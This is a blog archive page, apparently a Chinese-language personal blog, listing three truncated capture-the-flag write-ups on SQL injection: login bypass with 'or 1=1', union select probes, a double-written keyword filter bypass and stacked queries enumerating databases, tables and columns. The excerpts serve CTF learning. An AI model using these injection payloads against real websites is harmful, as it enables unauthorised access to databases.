Articles under the label of sql注入

  1. Home
  2. sql注入

sql注入学习记录(8)-[极客大挑战 2019]BabySQL(双写绕过)

[极客大挑战 2019]BabySQL 首先尝试万能密码 admin admin' or 1=1# 失败 一般注入 admin admin' union select 1,2,3# 失败 这里只显示了1,2,3#,怀疑是过滤了union,select`等关键字,尝试双鞋绕过 双写绕过 admin admin' ununionion selselectect 1,2,3# o...

  • yuaneuro
  • April 9, 2020
  • No comments
    •

    sql注入学习记录(7)-[强网杯 2019]随便注

    [强网杯 2019]随便注 这道题和前面那道差不多,也是堆叠注入 sqlmap是没有灵魂的 1';show databases;# 1';show tables;# 有两个表 1'; show columns from `1919810931114514`;# 1'; show columns from `words`;# 这里获取flag的操作比较骚,参考以为大佬的: 因为这...

  • yuaneuro
  • April 8, 2020
  • No comments
    •

    sql注入学习记录(6)-[SUCTF 2019]EasySQL(堆叠注入)

    sql注入学了主要还是用来打ctf的,在这里记录刷过关于sql注入的题目 [SUCTF 2019]EasySQL 从这道题学到了堆叠注入,顺便介绍一下 Stacked injections(堆叠注入) 从字面意思就是一堆sql语句注入众所周知,每条sql语句后面都是一;结尾的,那么我们就可以多句一起使用 与union的区别:union执行的语句类型是有限的,可以用来执行查询语句,而堆叠注...

  • yuaneuro
  • April 8, 2020
  • No comments